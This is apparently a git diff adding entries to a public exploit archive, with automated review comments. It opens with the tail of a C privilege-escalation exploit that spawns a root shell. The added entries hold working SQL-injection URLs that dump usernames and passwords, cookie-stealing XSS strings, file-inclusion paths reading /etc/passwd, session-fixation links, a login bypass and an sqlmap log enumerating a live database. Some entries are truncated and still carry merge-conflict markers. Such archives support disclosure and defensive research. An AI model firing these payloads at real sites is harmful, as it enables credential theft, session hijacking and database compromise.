+ if (getuid() != 0) {
+ puts("[-] priviledge escalation failed");
+ exit(EXIT_FAILURE);
+ }
+
+ /** get root shell **/
+ printf("[+] We are now uid=%i ... your welcome!\n", getuid());
+ printf("[+] Dropping a shell.\n");
+ execl("/bin/sh", "/bin/sh", NULL);
+ return 0;
+}
\ No newline at end of file
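Review bot: The ten `#include` directives at the top of the new file carry no header names, so the file as committed cannot compile; the names were most likely lost when angle-bracketed text was stripped on import and should be restored from the original submission rather than reconstructed by guesswork. `tmpnam()` followed by `mkdir()` is the classic racy pattern that compilers now warn about; `mkdtemp()` creates the directory atomically and replaces both calls. The status message `"[*] created sploit path%s\n"` is missing a space before the `%s`.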
diff --git a/platforms/php/local/32901.php b/platforms/php/local/32901.php
new file mode 100755
index 000000000..40f0355ce
--- /dev/null
+++ b/platforms/php/local/32901.php
@@ -0,0 +1,66 @@
+source: http://www.securityfocus.com/bid/34475/info
+
+PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access files in unauthorized locations.
+
+This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, with the 'safe_mode' and 'open_basedir' restrictions assumed to isolate the users from each other.
+
+PHP 5.2.9 is vulnerable; other versions may also be affected.
+
+
diff --git a/platforms/php/webapps/32807.txt b/platforms/php/webapps/32807.txt
new file mode 100755
index 000000000..5e8ee3bfc
--- /dev/null
+++ b/platforms/php/webapps/32807.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33859/info
+
+The gigCalendar component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+gigCalendar 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
+UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23
\ No newline at end of file
diff --git a/platforms/php/webapps/32808.txt b/platforms/php/webapps/32808.txt
new file mode 100755
index 000000000..1ae888a40
--- /dev/null
+++ b/platforms/php/webapps/32808.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33872/info
+
+Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+
+Magento 1.2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php/admin/
+Username: ">
\ No newline at end of file
diff --git a/platforms/php/webapps/32809.txt b/platforms/php/webapps/32809.txt
new file mode 100755
index 000000000..516819db6
--- /dev/null
+++ b/platforms/php/webapps/32809.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33872/info
+
+Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+
+Magento 1.2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php/admin/index/forgotpassword/
+Email address: ">
\ No newline at end of file
diff --git a/platforms/php/webapps/32810.txt b/platforms/php/webapps/32810.txt
new file mode 100755
index 000000000..eea5c7a3e
--- /dev/null
+++ b/platforms/php/webapps/32810.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33872/info
+
+Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+
+Magento 1.2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/downloader/?return=%22%3Cscript%3Ealert('xss')%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/32814.txt b/platforms/php/webapps/32814.txt
new file mode 100755
index 000000000..6d40c2e08
--- /dev/null
+++ b/platforms/php/webapps/32814.txt
@@ -0,0 +1,73 @@
+# Exploit Title: Sendy 1.1.9.1 - SQL Injection Vulnerability
+# Date: 2014-04-10
+# Exploit Author: marduk369
+# Vendor Homepage: http://sendy.co/
+# Software Link: http://sendy.co/
+# Version: 1.1.9.1
+
+root@kali:~# sqlmap -u 'http://server1/send-to?i=1&c=10' --cookie="version=1.1.9.1; PHPSESSID=[phpsessid value]; logged_in=[logged_in value]" -p c -D sendy --tables
+
+ sqlmap/1.0-dev - automatic SQL injection and database takeover tool
+ http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+[*] starting at 11:48:57
+
+[11:48:57] [INFO] resuming back-end DBMS 'mysql'
+[11:48:57] [INFO] testing connection to the target URL
+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
+---
+Place: GET
+Parameter: c
+ Type: AND/OR time-based blind
+ Title: MySQL > 5.0.11 AND time-based blind
+ Payload: c=10 AND SLEEP(5)&i=1
+---
+[11:48:58] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
+web application technology: PHP 5.3.2, Apache 2.2.14
+back-end DBMS: MySQL 5.0.11
+[11:48:58] [INFO] fetching tables for database: 'sendy'
+[11:48:58] [INFO] fetching number of tables for database 'sendy'
+[11:48:58] [WARNING] time-based comparison requires larger statistical model, please wait..............................
+do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
+[11:49:50] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
+[11:50:31] [INFO] adjusting time delay to 3 seconds due to good response times
+9
+[11:50:33] [INFO] retrieved: ap
+[11:53:39] [ERROR] invalid character detected. retrying..
+[11:53:39] [WARNING] increasing time delay to 4 seconds
+ps
+[11:56:31] [INFO] retrieved: ares
+[12:00:00] [INFO] retrieved: ares_emails
+[12:08:38] [INFO] retrieved: campaigns
+[12:18:08] [INFO] retrieved: links
+[12:24:28] [ERROR] invalid character detected. retrying..
+[12:24:28] [WARNING] increasing time delay to 5 seconds
+
+[12:24:31] [INFO] retrieved: lists
+[12:29:49] [INFO] retrieved: login
+[12:36:33] [ERROR] invalid character detected. retrying..
+[12:36:33] [WARNING] increasing time delay to 6 seconds
+
+[12:36:37] [INFO] retrieved: queue
+[12:43:51] [INFO] retrieved: subscribers
+Database: sendy
+[9 tables]
++-------------+
+| apps |
+| ares |
+| ares_emails |
+| campaigns |
+| links |
+| lists |
+| login |
+| queue |
+| subscribers |
++-------------+
+
+[13:00:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/server1'
+
+[*] shutting down at 13:00:16
+
diff --git a/platforms/php/webapps/32816.txt b/platforms/php/webapps/32816.txt
new file mode 100755
index 000000000..c9577d97f
--- /dev/null
+++ b/platforms/php/webapps/32816.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33908/info
+
+Orooj CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/news.php?nid=-1+union+select+1,2,3,4,5,concat(sm_username,char(58),sm_password),7,8,9+from+tbl_site_member
\ No newline at end of file
diff --git a/platforms/php/webapps/32819.txt b/platforms/php/webapps/32819.txt
new file mode 100755
index 000000000..045371a07
--- /dev/null
+++ b/platforms/php/webapps/32819.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33914/info
+
+Parsi PHP CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Parsi PHP CMS 2.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[p4th]/index.php?Cat=-9999'+union+select+1,2,3,concat(user_username,char(58),user_password),5,6,7,8,9,10,11,12,13,14,15,16+from+parsiphp_u
+ser/*
\ No newline at end of file
diff --git a/platforms/php/webapps/32823.txt b/platforms/php/webapps/32823.txt
new file mode 100755
index 000000000..abeccd5bd
--- /dev/null
+++ b/platforms/php/webapps/32823.txt
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/33931/info
+
+Irokez Blog is prone to multiple input-validation vulnerabilities:
+
+- A cross-site scripting issue
+- An SQL-injection issue
+- Multiple remote file-include issues
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Irokez Blog 0.7.3.2 is vulnerable; other versions may also be affected.
+
+
+http://www.example.com/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115
+http://www.example.com/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114
+
+http://www.example.com/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]
+http://www.example.com/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]
+http://www.example.com/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]
+http://www.example.com/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]
\ No newline at end of file
diff --git a/platforms/php/webapps/32827.txt b/platforms/php/webapps/32827.txt
new file mode 100755
index 000000000..3a4ddca80
--- /dev/null
+++ b/platforms/php/webapps/32827.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33943/info
+
+Afian is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
+
+http://www.example.com/path/css/includer.php?files=PATH_TO_FILES
diff --git a/platforms/php/webapps/32828.txt b/platforms/php/webapps/32828.txt
new file mode 100755
index 000000000..ccfabf3c9
--- /dev/null
+++ b/platforms/php/webapps/32828.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/33944/info
+
+Yektaweb Academic Web Tools CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+
+Academic Web Tools CMS 1.5.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/login.php?slct_pg_id=53&sid=1*/-->&slc_lang=fa
+http://www.example.com/page_arch.php?slc_lang=fa&sid=1&logincase=*/-->
+http://www.example.com/page.php?sid=1&slc_lang=en&redirect=*/-->
diff --git a/platforms/php/webapps/32830.txt b/platforms/php/webapps/32830.txt
new file mode 100755
index 000000000..4f5c5ad0b
--- /dev/null
+++ b/platforms/php/webapps/32830.txt
@@ -0,0 +1,50 @@
+# Exploit Title: CubeCart 5.2.8 Session Fixation
+# Exploit Author: James Sibley (absane)
+# Blog: http://www.pentester.co
+# Download link: http://www.cubecart.com/download/5.2.8/zip
+# Discovery date: March 14th, 2014
+# Vendor notified: March 15th, 2014
+# Vendor fixed: April 10th, 2014
+# Vendor ack: http://forums.cubecart.com/topic/48427-cubecart-529-relased/
+# CVE assignment: CVE-2014-2341
+
+CubeCart 5.2.8 is vulnerable to a session fixation vulnerability.
+
+The only protection offered is via the User-Agent header field, which can spoofed to match the victim.
+
+=======================
+=Proof of Concept.....=
+=======================
+
+*Set the User-Agent for both attacker and victim:
+Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
+
+*To attack a customer:
+Victim visits: http://[CubeCart Site]/index.php?PHPSESSID=1337
+
+*To attack an administrator:
+Victim visits: http://[CubeCart Site]/admin.php?PHPSESSID=1337
+
+When the victim logs in, the attacker can visit the same link (using the same User-Agent) and hijack the victim's session.
+
+=======================
+=Cause................=
+=======================
+
+The PHPSESSID parameter is not ignored and allows an attacker to specify their own session id.
+
+The code handling login procedures do not generate new sessions upon successful authentication.
+
+=======================
+=Mitigation...........=
+=======================
+
+Upgrade to CubeCart >= 5.2.9
+
+If upgrading is not an option, here is a hackish workaround for the session fixation vulnerability:
+
+In admin.class.php add this at line 324:
+$GLOBALS['session']->restart();
+
+In user.class.php add this at line 227:
+$GLOBALS['session']->restart();
\ No newline at end of file
diff --git a/platforms/php/webapps/32831.txt b/platforms/php/webapps/32831.txt
new file mode 100755
index 000000000..12eec4be2
--- /dev/null
+++ b/platforms/php/webapps/32831.txt
@@ -0,0 +1,36 @@
+###########################################################
+[~] Exploit Title: Microweber CMS v0.93 CSRF Vulnerability
+[~] Author: sajith
+[~] version: Microweber CMS v0.93
+[~]Vendor Homepage: http://microweber.com/
+[~] vulnerable app link:http://microweber.com/download
+###########################################################
+
+[*] Application is vulnerable to CSRF.below is the POC where attacker can
+use this vulnerability to create new user and assign Admin role to the user
+
+
+
+POC by sajith shetty
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/platforms/php/webapps/32835.txt b/platforms/php/webapps/32835.txt
new file mode 100755
index 000000000..9e1831fae
--- /dev/null
+++ b/platforms/php/webapps/32835.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33968/info
+
+NovaBoard is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+NovaBoard 1.0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
diff --git a/platforms/php/webapps/32840.txt b/platforms/php/webapps/32840.txt
new file mode 100755
index 000000000..9e37160ed
--- /dev/null
+++ b/platforms/php/webapps/32840.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/34016/info
+
+Amoot Web Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[Path]/modir
+
+Username:admin
+Password: ' or '
\ No newline at end of file
diff --git a/platforms/php/webapps/32841.txt b/platforms/php/webapps/32841.txt
new file mode 100755
index 000000000..08c594402
--- /dev/null
+++ b/platforms/php/webapps/32841.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34017/info
+
+CMSCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CMSCart 1.04 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cmscart/index.php?MenuLevel1=%27
\ No newline at end of file
diff --git a/platforms/php/webapps/32842.txt b/platforms/php/webapps/32842.txt
new file mode 100755
index 000000000..db7f02787
--- /dev/null
+++ b/platforms/php/webapps/32842.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34018/info
+
+UMI CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to UMI CMS 2.7.1 (build 10856) are vulnerable.
+
+http://www.example.com/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&fields_filter[price][1]=1
diff --git a/platforms/php/webapps/32843.txt b/platforms/php/webapps/32843.txt
new file mode 100755
index 000000000..a24cf4653
--- /dev/null
+++ b/platforms/php/webapps/32843.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34021/info
+
+TinX CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Versions prior to TinX CMS 3.5.1 are vulnerable.
+
+http://www.example.com/system/rss.php?id=1'SQL-code
\ No newline at end of file
diff --git a/platforms/php/webapps/32844.txt b/platforms/php/webapps/32844.txt
new file mode 100755
index 000000000..b2af7f308
--- /dev/null
+++ b/platforms/php/webapps/32844.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34038/info
+
+PHORTAIL is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+PHORTAIL 1.2.1 is vulnerable; other versions may also be affected.
+
+PHORTAIL v1.2.1 XSS Vulnerability
Module : PHORTAIL 1.2.1 download : http://www.phpscripts-fr.net/scripts/download.php?id=330 Vul : XSS Vulnerability file : poster.php Author : Jonathan Salwan Mail : submit [AT] shell-storm.org Web : http://www.shell-storm.org
=>Pseudo =>E-mail =>XSS vulnerability =>text
\ No newline at end of file
diff --git a/platforms/php/webapps/32846.txt b/platforms/php/webapps/32846.txt
new file mode 100755
index 000000000..b84e17b09
--- /dev/null
+++ b/platforms/php/webapps/32846.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/34067/info
+
+Nenriki CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Nenriki CMS 0.5 is vulnerable; other versions may also be affected.
+
+javascript:document.cookie ="password=1; path=/" then
+javascript:document.cookie ="ID=' union select 0,0,0,concat(id,name,char(58),password),0,0 from users--; path=/"
\ No newline at end of file
diff --git a/platforms/php/webapps/32852.txt b/platforms/php/webapps/32852.txt
new file mode 100755
index 000000000..3ba8427e8
--- /dev/null
+++ b/platforms/php/webapps/32852.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34105/info
+
+TikiWiki is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
+
+TikiWiki 2.2 through 3.0 beta1 are vulnerable.
+
+http://www.example.com/tiki-galleries.php/>">
\ No newline at end of file
diff --git a/platforms/php/webapps/32853.txt b/platforms/php/webapps/32853.txt
new file mode 100755
index 000000000..5190a760f
--- /dev/null
+++ b/platforms/php/webapps/32853.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34106/info
+
+TikiWiki is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
+
+TikiWiki 2.2 through 3.0 beta1 are vulnerable.
+
+http://www.example.com/tiki-list_file_gallery.php/>">
\ No newline at end of file
diff --git a/platforms/php/webapps/32854.txt b/platforms/php/webapps/32854.txt
new file mode 100755
index 000000000..2cd18a88e
--- /dev/null
+++ b/platforms/php/webapps/32854.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34107/info
+
+TikiWiki is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
+
+TikiWiki 2.2 through 3.0 beta1 are vulnerable.
+
+http://www.example.com/tiki-listpages.php/>">
\ No newline at end of file
diff --git a/platforms/php/webapps/32861.txt b/platforms/php/webapps/32861.txt
new file mode 100755
index 000000000..f2eed0032
--- /dev/null
+++ b/platforms/php/webapps/32861.txt
@@ -0,0 +1,11 @@
+[+] Local File Inclusion in WordPress Theme LineNity
+[+] Date: 13/04/2014
+[+] Risk: High
+[+] Author: Felipe Andrian Peixoto
+[+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
+[+] Contact: felipe_andrian@hotmail.com
+[+] Tested on: Windows 7 and Linux
+[+] Vulnerable File: download.php
+[+] Exploit : http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ]
+[+] PoC: http://localhost/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php
+ http://localhost/wordpress/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/32867.txt b/platforms/php/webapps/32867.txt
new file mode 100755
index 000000000..0a667ef49
--- /dev/null
+++ b/platforms/php/webapps/32867.txt
@@ -0,0 +1,61 @@
+Details
+================
+Software: Quick Page/Post Redirect Plugin
+Version: 5.0.3
+Homepage: http://wordpress.org/plugins/quick-pagepost-redirect-plugin/
+Advisory ID: dxw-1970-1091
+CVE: CVE-2014-2598
+CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
+
+Description
+================
+CSRF and stored XSS in Quick Page/Post Redirect Plugin
+
+Vulnerability
+================
+This plugin is vulnerable to a combination CSRF/XSS attack meaning that if an admin user can be persuaded to visit a URL of the attacker’s choosing (via spear phishing for instance), the attacker can insert arbitrary JavaScript into an admin page. Once that occurs the admin’s browser can be made to do almost anything the admin user could typically do such as create/delete posts, create new admin users, or even exploit vulnerabilities in other plugins.
+
+Proof of concept
+================
+Use the following form to introduce potentially malicious JavaScript:
+
+ \">
+
+
+
+
+
+Mitigations
+================
+Upgrade to version 5.0.5 or later.
+
+Disclosure policy
+================
+dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
+
+Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
+
+This vulnerability will be published if we do not receive a response to this report with 14 days.
+
+Timeline
+================
+
+2014-03-21: Discovered
+2014-03-24: Reported to plugins@wordpress.org
+2014-04-07: No response; requested an alternative email address using the author’s contact form.
+2014-04-08: Re-reported direct to author
+2014-04-08: Author responded, and publication agreed on or before 2014-05-06
+2014-04-10: Author reports issue fixed in version 5.0.5
+
+<<<<<<< HEAD
+
+Discovered by dxw:
+================
+Tom Adams
+=======
+
+Discovered by dxw:
+================
+Tom Adams
+>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464
+Please visit security.dxw.com for more information.
\ No newline at end of file
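Review bot: Unresolved merge-conflict markers are committed into the new file (`<<<<<<< HEAD`, `=======`, `>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464`), leaving the "Discovered by dxw:" block duplicated; the same markers appear in platforms/php/webapps/32868.txt. Both sides of the conflict are identical, so the fix is to keep one copy of the three-line block and drop the three marker lines in each file. The "Proof of concept" section also holds only a fragment (` \">`), which suggests the HTML form from the original advisory was stripped on import — worth restoring from the source advisory if it is still available, or noting in the file that the PoC was lost.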
diff --git a/platforms/php/webapps/32868.txt b/platforms/php/webapps/32868.txt
new file mode 100755
index 000000000..34b18aa4b
--- /dev/null
+++ b/platforms/php/webapps/32868.txt
@@ -0,0 +1,57 @@
+Details
+================
+Software: Twitget
+Version: 3.3.1
+Homepage: http://wordpress.org/plugins/twitget/
+Advisory ID: dxw-1970-435
+CVE: CVE-2014-2559
+CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:P/A:N)
+
+Description
+================
+CSRF/XSS vulnerability in Twitget 3.3.1
+
+Vulnerability
+================
+If a logged-in administrator visits a specially crafted page, options can be updated (CSRF) without their consent, and some of those options are output unescaped into the form (XSS). In this example the XSS occurs at line 755 in twitget.php. The nonce-checking should have occurred somewhere around line 661 in the same file.
+
+Proof of concept
+================
+
+
+ \">
+
+
+
+Mitigations
+================
+Upgrade to version 3.3.3 or later.
+
+Disclosure policy
+================
+dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
+
+Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
+
+This vulnerability will be published if we do not receive a response to this report with 14 days.
+
+Timeline
+================
+
+2013-07-30: Discovered
+2014-03-18: Reported to plugins@wordpress.org
+2014-04-09: Author reports fixed in version 3.3.3.
+
+<<<<<<< HEAD
+
+Discovered by dxw:
+================
+Tom Adams
+=======
+
+Discovered by dxw:
+================
+Tom Adams
+>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464
+Please visit security.dxw.com for more information.
+
\ No newline at end of file
diff --git a/platforms/php/webapps/32871.txt b/platforms/php/webapps/32871.txt
new file mode 100755
index 000000000..9a51d76f7
--- /dev/null
+++ b/platforms/php/webapps/32871.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34193/info
+
+ExpressionEngine is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+ExpressionEngine 1.6.4 through 1.6.6 are affected. Other versions may also be vulnerable.
+
+chococat.gif">
52%23
\ No newline at end of file
diff --git a/platforms/php/webapps/32875.txt b/platforms/php/webapps/32875.txt
new file mode 100755
index 000000000..ed92cdebf
--- /dev/null
+++ b/platforms/php/webapps/32875.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34232/info
+
+Comparison Engine Power is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Comparison Engine Power 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/comparisonengine/product.comparision.php?cat=null union all select 1,concat_ws(0x3a,id,email,password,nickname),3,4,5 from daype_users_tb--&name=GSM
\ No newline at end of file
diff --git a/platforms/php/webapps/32880.txt b/platforms/php/webapps/32880.txt
new file mode 100755
index 000000000..c85f482d4
--- /dev/null
+++ b/platforms/php/webapps/32880.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/34324/info
+
+Turnkey eBook Store is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
+
+Turnkey eBook Store 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?cmd=search&keywords=">
+http://www.example.com/index.php?cmd=search&keywords=
\ No newline at end of file
diff --git a/platforms/php/webapps/32887.txt b/platforms/php/webapps/32887.txt
new file mode 100755
index 000000000..5cf04f4a8
--- /dev/null
+++ b/platforms/php/webapps/32887.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/34348/info
+
+osCommerce is prone to a session-fixation vulnerability.
+
+Attackers can exploit this issue to hijack a user's session and gain unauthorized access to the affected application.
+
+The following are vulnerable:
+
+osCommerce 2.2
+osCommerce 3.0 Beta
+
+Other versions may also be affected.
+
+http://www.example.com/myapp/index.php?oscid=arbitrarysession
\ No newline at end of file
diff --git a/platforms/php/webapps/32889.txt b/platforms/php/webapps/32889.txt
new file mode 100755
index 000000000..a7003b693
--- /dev/null
+++ b/platforms/php/webapps/32889.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/34355/info
+
+4CMS is prone to multiple SQL-injection vulnerabilities and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting the SQL-injection issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The attacker can exploit the local file-include issue to execute arbitrary local script code and obtain sensitive information that may aid in further attacks.
+
+http://www.example.com/frontend/article.php?aid=-9999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
+http://www.example.com/frontend/articles.php?cid=-999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
+http://www.example.com/frontend/index.php?chlang=../../../../etc/services%00
\ No newline at end of file
diff --git a/platforms/php/webapps/32905.txt b/platforms/php/webapps/32905.txt
new file mode 100755
index 000000000..bcd4b4ed0
--- /dev/null
+++ b/platforms/php/webapps/32905.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34500/info
+
+LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
+
+Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to LinPHA 1.3.4 are vulnerable.
+
+http://www.example.com/linpha-1.3.2/login.php?ref='>
\ No newline at end of file
diff --git a/platforms/php/webapps/32906.txt b/platforms/php/webapps/32906.txt
new file mode 100755
index 000000000..17fbd5c1c
--- /dev/null
+++ b/platforms/php/webapps/32906.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/34500/info
+
+LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
+
+Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to LinPHA 1.3.4 are vulnerable.
+
+http://www.example.com/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/32910.txt b/platforms/php/webapps/32910.txt
new file mode 100755
index 000000000..9f0ad5295
--- /dev/null
